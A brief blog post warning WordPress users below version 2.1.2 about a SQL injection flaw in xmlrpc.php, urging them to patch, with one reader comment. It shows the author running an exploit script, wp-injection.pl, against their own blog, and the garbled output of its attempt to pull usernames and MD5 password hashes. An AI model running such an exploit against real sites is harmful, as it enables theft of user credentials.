WordPress 2.1.2 SQL Injection Vulnerabilities

If you are running WordPress below version 2.1.2, patch it immediately: it is vulnerable to SQL injection. Here is my test before the patch.


wp-injection.pl http://www.takizo.com/blog/xmlrpc.php xxxxx xxxxx 10

The usage is correct
[*] Trying Host http://www.takizo.com/blog/xmlrpc.php ...
[+] The xmlrpc server seems to be working
--------------------
Username for id = 1 is:--> 3
AN
Md5 hash for user: 3
AN
is: 3
AND post_id = 10 union al
--------------------
Username for id = 2 is:--> 3
AN
Md5 hash for user: 3
AN
is: 3
AND post_id = 10 union al

Of course there is more that I didn’t show la; just patch it! If you are lazy, this fellow can help you do it for free.

One Response to “WordPress 2.1.2 SQL Injection Vulnerabilities”

  1. 星 Says:

    I upgraded already :D